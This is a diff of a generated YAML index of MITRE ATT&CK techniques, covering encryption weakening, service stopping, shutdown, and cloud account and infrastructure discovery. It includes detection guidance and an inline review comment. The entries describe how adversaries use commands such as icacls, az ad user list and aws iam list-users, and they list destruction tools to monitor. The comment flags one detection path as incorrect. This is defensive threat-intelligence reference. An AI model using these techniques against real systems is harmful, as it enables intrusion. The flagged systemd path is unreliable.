+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497
+ url: https://attack.mitre.org/techniques/T1497
+ - source_name: Unit 42 Pirpi July 2015
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -36399,22 +41053,53 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_version: '1.2'
+ atomic_tests: []
+ T1600:
+ technique:
+ id: attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8
+ description: |-
+ Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
+
+ Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
+
+ Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)
+ name: Weaken Encryption
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1600
+ url: https://attack.mitre.org/techniques/T1600
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T22:37:49.258Z'
+ created: '2020-10-19T18:47:08.759Z'
x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
+ - File monitoring
x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
+ - Network
+ x_mitre_detection: There is no documented method for defenders to directly identify
+ behaviors that weaken encryption. Detection efforts may be focused on closely
+ related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601).
+ Some detection methods require vendor support to aid in investigation.
x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
+ - Encryption
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
atomic_tests: []
T1550.004:
technique:
@@ -36422,6 +41107,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1550.004
url: https://attack.mitre.org/techniques/T1550/004
+ - external_id: CAPEC-60
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/60.html
- description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
@@ -36447,9 +41135,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.501Z'
+ modified: '2020-09-16T19:40:44.527Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -36500,15 +41188,15 @@ defense-evasion:
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
- Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
+ Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
id: attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T23:07:55.953Z'
+ modified: '2020-09-01T20:05:05.268Z'
created: '2020-02-04T19:17:41.767Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
@@ -37312,13 +42000,13 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-27T21:09:28.699Z'
+ modified: '2020-10-14T14:52:11.708Z'
created: '2019-03-15T13:59:30.390Z'
x_mitre_is_subtechnique: false
x_mitre_impact_type:
- Availability
x_mitre_detection: |-
- Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
+ Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
x_mitre_data_sources:
@@ -37432,6 +42120,12 @@ impact:
- source_name: mitre-attack
external_id: T1498.001
url: https://attack.mitre.org/techniques/T1498/001
+ - external_id: CAPEC-125
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/125.html
+ - external_id: CAPEC-486
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/486.html
- source_name: USNYAG IranianBotnet March 2016
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
description: Preet Bharara, US Attorney. (2016, March 24). Retrieved April
@@ -37453,7 +42147,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:10:52.360Z'
+ modified: '2020-09-16T15:57:12.410Z'
created: '2020-03-02T20:07:18.651Z'
x_mitre_data_sources:
- Sensor health and status
@@ -37473,7 +42167,7 @@ impact:
time may be small and the indicator of an event availability of the network
or service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -37754,7 +42448,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T02:07:27.676Z'
+ modified: '2020-09-16T15:56:03.459Z'
created: '2019-04-18T11:00:55.862Z'
x_mitre_is_subtechnique: false
x_mitre_detection: |-
@@ -38158,7 +42852,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:11:28.903Z'
+ modified: '2020-09-16T15:58:18.788Z'
created: '2019-04-17T20:23:15.105Z'
x_mitre_is_subtechnique: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
@@ -38199,6 +42893,12 @@ impact:
- source_name: mitre-attack
external_id: T1499.001
url: https://attack.mitre.org/techniques/T1499/001
+ - external_id: CAPEC-469
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/469.html
+ - external_id: CAPEC-482
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/482.html
- source_name: Arbor AnnualDoSreport Jan 2018
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
@@ -38232,9 +42932,9 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:43:29.320Z'
+ modified: '2020-09-16T15:54:35.429Z'
created: '2020-02-20T15:27:18.581Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -38262,6 +42962,9 @@ impact:
- source_name: mitre-attack
external_id: T1498.002
url: https://attack.mitre.org/techniques/T1498/002
+ - external_id: CAPEC-490
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/490.html
- source_name: Cloudflare ReflectionDoS May 2017
url: https://blog.cloudflare.com/reflections-on-reflections/
description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
@@ -38301,7 +43004,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-23T12:55:30.119Z'
+ modified: '2020-09-16T15:58:18.490Z'
created: '2020-03-02T20:08:03.691Z'
x_mitre_data_sources:
- Sensor health and status
@@ -38321,7 +43024,7 @@ impact:
the lead time may be small and the indicator of an event availability of the
network or service drops. The analysis tools mentioned can then be used to
determine the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -38468,6 +43171,15 @@ impact:
- source_name: mitre-attack
external_id: T1499.002
url: https://attack.mitre.org/techniques/T1499/002
+ - external_id: CAPEC-488
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/488.html
+ - external_id: CAPEC-489
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/489.html
+ - external_id: CAPEC-528
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/528.html
- source_name: Arbor AnnualDoSreport Jan 2018
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
@@ -38501,9 +43213,9 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:52:53.947Z'
+ modified: '2020-09-16T15:56:03.131Z'
created: '2020-02-20T15:31:43.613Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -38573,25 +43285,28 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-07-14T19:34:47.636Z'
+ modified: '2020-07-24T15:36:08.042Z'
created: '2019-03-29T19:00:55.901Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
+ - Linux
+ - macOS
x_mitre_permissions_required:
- Administrator
- SYSTEM
- User
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
- Monitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services.
+ Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
x_mitre_data_sources:
+ - File monitoring
- Process command-line parameters
- Process monitoring
- Windows Registry
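Review bot: The rewritten `x_mitre_detection` text on the `+ Monitor for edits for modifications ...` line lists `/home/.config/systemd/user/` as a systemd unit location, but the per-user unit directory is under each user's home (`~/.config/systemd/user/`, i.e. `/home/<user>/.config/systemd/user/`), so a detection rule built from the quoted path would monitor a directory that does not normally exist. The wording "Monitor for edits for modifications" also reads as a leftover from the edit. This text appears to be inherited from the upstream ATT&CK data, so the correction belongs there rather than in this generated index, but it is worth flagging before anyone codifies the path. The `T1489` technique block starts before this hunk.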
@@ -38713,6 +43428,21 @@ impact:
atomic_tests: []
T1529:
technique:
+ created: '2019-10-04T20:42:28.541Z'
+ modified: '2020-03-27T21:18:48.149Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ type: attack-pattern
+ id: attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc
+ description: |-
+ Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
+
+ Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
+ name: System Shutdown/Reboot
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1529
@@ -38729,42 +43459,27 @@ impact:
url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: System Shutdown/Reboot
- description: |-
- Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
-
- Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
- id: attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- modified: '2020-03-27T21:18:48.149Z'
- created: '2019-10-04T20:42:28.541Z'
- x_mitre_is_subtechnique: false
- x_mitre_detection: Use process monitoring to monitor the execution and command
- line parameters of binaries involved in shutting down or rebooting systems.
- Windows event logs may also designate activity associated with a shutdown/reboot,
- ex. Event ID 1074 and 6006.
- x_mitre_version: '1.0'
- x_mitre_impact_type:
- - Availability
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_data_sources:
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_version: '1.0'
+ x_mitre_detection: Use process monitoring to monitor the execution and command
+ line parameters of binaries involved in shutting down or rebooting systems.
+ Windows event logs may also designate activity associated with a shutdown/reboot,
+ ex. Event ID 1074 and 6006.
+ x_mitre_is_subtechnique: false
identifier: T1529
atomic_tests:
- name: Shutdown System - Windows
@@ -38972,13 +43687,16 @@ discovery:
- source_name: mitre-attack
external_id: T1087
url: https://attack.mitre.org/techniques/T1087
+ - external_id: CAPEC-575
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/575.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T15:27:59.127Z'
+ modified: '2020-09-16T15:10:18.260Z'
created: '2017-05-31T21:31:06.988Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -39006,7 +43724,7 @@ discovery:
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Travis Smith, Tripwire
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
atomic_tests: []
T1010:
technique:
@@ -39256,6 +43974,16 @@ discovery:
Directory Leaks via Azure. Retrieved October 6, 2019.
url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
source_name: Black Hills Red Teaming MS AD Azure, 2018
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -39263,22 +43991,32 @@ discovery:
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
remote support, services, or for administration of resources within a cloud
- service provider of SaaS application.\n\nWith authenticated access there are
+ service provider or SaaS application.\n\nWith authenticated access there are
several tools that can be used to find accounts. The Get-MsolRoleMember
PowerShell cmdlet can be used to obtain account names given a role or permissions
- group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure
- CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated
- access to a domain. The command az ad user list will list all
- users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red
- Teaming MS AD Azure, 2018) "
+ group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub
+ Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user
+ accounts with authenticated access to a domain. The command az ad user
+ list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation:
+ Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam
+ list-users may be used to obtain a list of users in the current account
+ while aws iam list-roles can obtain IAM roles that have a specified
+ path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud
+ iam service-accounts list and gcloud projects get-iam-policy
+ may be used to obtain a listing of service accounts and users in a project.(Citation:
+ Google Cloud - IAM Servie Accounts List API)"
id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-13T20:05:15.448Z'
+ modified: '2020-08-13T16:53:55.390Z'
created: '2020-02-21T21:08:36.570Z'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_data_sources:
+ - Stackdriver logs
+ - AWS CloudTrail logs
- Azure activity logs
- Office 365 account logs
- Process monitoring
@@ -39286,10 +44024,10 @@ discovery:
x_mitre_permissions_required:
- User
x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
- x_mitre_version: '1.0'
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- AWS
@@ -39334,9 +44072,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-12T19:25:12.782Z'
+ modified: '2020-10-08T17:34:39.077Z'
created: '2020-02-21T21:15:33.222Z'
x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
- Azure activity logs
- Office 365 account logs
- API monitoring
@@ -39348,11 +44089,83 @@ discovery:
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Office 365
- Azure AD
+ - GCP
+ - SaaS
+ - Azure
+ - AWS
+ atomic_tests: []
+ T1580:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1580
+ url: https://attack.mitre.org/techniques/T1580
+ - source_name: Amazon Describe Instance
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
+ description: Amazon. (n.d.). describe-instance-information. Retrieved March
+ 3, 2020.
+ - source_name: Amazon Describe Instances API
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
+ description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ - source_name: Google Compute Instances
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
+ description: Google. (n.d.). gcloud compute instances list. Retrieved May
+ 26, 2020.
+ - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ source_name: Microsoft AZ CLI
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-09-17T16:41:23.267Z'
+ created: '2020-08-20T17:51:25.671Z'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users. To reduce false positives, valid change management procedures
+ could introduce a known identifier that is logged with the change (e.g., tag
+ or header) if supported by the cloud provider, to help distinguish valid,
+ expected actions from malicious ones.
+ x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
+ - Azure activity logs
+ x_mitre_platforms:
+ - AWS
+ - Azure
+ - GCP
atomic_tests: []
T1538:
technique:
@@ -39914,12 +44727,6 @@ discovery:
name: command_prompt
T1482:
technique:
- created: '2019-02-14T16:15:05.974Z'
- modified: '2020-03-26T16:13:21.085Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1482
@@ -39934,7 +44741,7 @@ discovery:
Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved
February 14, 2019.
- source_name: Harmj0y Domain Trusts
- url: 'http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ '
+ url: http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
description: Schroeder, W. (2017, October 30). A Guide to Attacking Domain
Trusts. Retrieved February 14, 2019.
- source_name: Microsoft Operation Wilysupply
@@ -39963,6 +44770,12 @@ discovery:
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-09-17T18:26:17.858Z'
+ created: '2019-02-14T16:15:05.974Z'
x_mitre_version: '1.1'
x_mitre_permissions_required:
- User
@@ -40165,49 +44978,55 @@ discovery:
T1083:
technique:
created: '2017-05-31T21:31:04.710Z'
- modified: '2020-03-26T17:18:36.857Z'
+ modified: '2020-09-16T16:02:16.770Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
type: attack-pattern
- id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: File and Directory Discovery
- description: |-
- Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1083
url: https://attack.mitre.org/techniques/T1083
+ - external_id: CAPEC-127
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/127.html
+ - external_id: CAPEC-497
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/497.html
- url: http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
description: Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers.
Retrieved February 2, 2016.
source_name: Windows Commands JPCERT
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_system_requirements:
- - Some folders may require Administrator, SYSTEM or specific user depending
- on permission levels and access controls
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
